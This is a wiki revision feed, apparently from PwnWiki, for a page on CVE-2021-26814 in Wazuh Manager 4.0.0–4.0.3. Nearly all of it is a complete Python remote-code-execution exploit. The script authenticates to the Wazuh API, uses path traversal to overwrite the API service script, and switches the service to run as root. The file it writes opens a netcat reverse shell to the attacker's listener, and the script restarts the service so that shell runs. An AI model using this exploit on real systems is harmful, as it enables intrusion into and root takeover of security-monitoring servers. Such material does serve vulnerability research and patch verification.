https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-26814_Wazuh_Manager_%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2021-26814 Wazuh Manager 代碼執行漏洞 - Revision history
2026-04-15T11:33:26Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-26814_Wazuh_Manager_%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=3037&oldid=prev
Pwnwiki: Created page with "==影響版本== <pre> Wazuh Manager v.4.0.0-4.0.3 </pre> ==POC== <pre> # Exploit Title: Wazuh 4.0.3 API RCE # Author: WickdDavid (Davide Meacci) # Date: 2021-01-01 # Vendor..."
2021-05-22T02:23:23Z
<p>Created page with "==影響版本== <pre> Wazuh Manager v.4.0.0-4.0.3 </pre> ==POC== <pre> # Exploit Title: Wazuh 4.0.3 API RCE # Author: WickdDavid (Davide Meacci) # Date: 2021-01-01 # Vendor..."</p>
<p><b>New page</b></p><div>==影響版本==<br />
<pre><br />
Wazuh Manager v.4.0.0-4.0.3<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
# Exploit Title: Wazuh 4.0.3 API RCE<br />
# Author: WickdDavid (Davide Meacci)<br />
# Date: 2021-01-01<br />
# Vendor Homepage: https://github.com/wazuh/wazuh<br />
# Version : 4.0.3<br />
<br />
<br />
import requests<br />
import sys<br />
import argparse<br />
import time<br />
import json<br />
from urllib3.exceptions import InsecureRequestWarning<br />
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br />
<br />
<br />
parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')<br />
parser.add_argument('-user', dest='username',required=True,<br />
help='wazuh API username')<br />
parser.add_argument('-pwd', dest='password',required=True,<br />
help='wazuh API password')<br />
parser.add_argument('-lip', dest='srcip',required=True,<br />
help='listening server')<br />
parser.add_argument('-lport', dest='srcport',required=True,<br />
help='listening port')<br />
parser.add_argument('-tip', dest='destip',required=True,<br />
help='target server ip (wazuh API)')<br />
parser.add_argument('-tport', dest='destport',required=True,<br />
help='target server port (wazuh API)')<br />
<br />
<br />
args = parser.parse_args()<br />
<br />
# executed payload may be changed here<br />
<br />
exec_payload = """<br />
import os #:l<br />
os.system("nc %s %s -e /bin/sh") #:l<br />
""" % (args.srcip, args.srcport)<br />
<br />
<br />
config_payload = { "drop_privileges": False }<br />
<br />
<br />
proxies = {<br />
"http":"http://127.0.0.1:8080",<br />
"https":"https://127.0.0.1:8080"<br />
}<br />
<br />
target = "https://%s:%s" % (args.destip,args.destport)<br />
auth_token = ""<br />
path_traversal = "etc/lists/../../../../.."<br />
headers = {}<br />
<br />
# step 1 - obtaining auth token<br />
<br />
r = requests.get("%s/security/user/authenticate?raw=true" % target, auth=(args.username, args.password),verify=False)<br />
<br />
if(r.status_code == 200):<br />
auth_token = r.text<br />
headers["Authorization"] = "Bearer %s" % auth_token<br />
else:<br />
print("[!] No auth code recovered. Check username and password")<br />
exit(1)<br />
<br />
# step 2 - Privilege Escalation on API (not implemented)<br />
<br />
<br />
# step 3 - Save files to be restored later<br />
<br />
file_to_overwrite = "/var/ossec/api/scripts/wazuh-apid.py"<br />
print("[+] Saving files to restore later...")<br />
r = requests.get("%s/manager/files?path=%s%s" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)<br />
f = open("backup.py","w")<br />
f.write(json.loads(r.text)["contents"])<br />
f.close()<br />
time.sleep(1)<br />
<br />
# step 4 - Local Privilege Escalation <br />
<br />
print("[+] Changing API config to run as root...")<br />
r = requests.put("%s/manager/api/config" % target, headers = headers, json = config_payload, verify=False)<br />
time.sleep(1)<br />
<br />
# step 5 - Restart server (now api service runs as root) <br />
<br />
print("[+] Restarting server...")<br />
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)<br />
#print(r.text)<br />
<br />
data = {"title":"Bad Request"}<br />
while "title" in data and "Bad request" in data["title"]:<br />
time.sleep(5)<br />
try:<br />
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)<br />
#print(r.text)<br />
data = json.loads(r.text)<br />
except:<br />
continue<br />
<br />
# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload<br />
<br />
print("[+] Uploading payload...")<br />
r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)<br />
#print(r.text)<br />
time.sleep(1)<br />
<br />
# step 7 - Restart server (now malicious payload will be run by the server)<br />
<br />
<br />
print("[+] Restarting API service for the last time...")<br />
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)<br />
#print(r.text)<br />
<br />
data = {"title":"Bad Request"}<br />
while "title" in data and "Bad request" in data["title"]:<br />
time.sleep(5)<br />
try:<br />
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)<br />
#print(r.text)<br />
data = json.loads(r.text)<br />
except:<br />
continue<br />
<br />
<br />
print("[+] Payload executed, check your shell now.")<br />
print("[+] Remember to restore changed file (check local backup file)")<br />
</pre><br />
<br />
==Github==<br />
https://github.com/WickdDavid/CVE-2021-26814</div>
Pwnwiki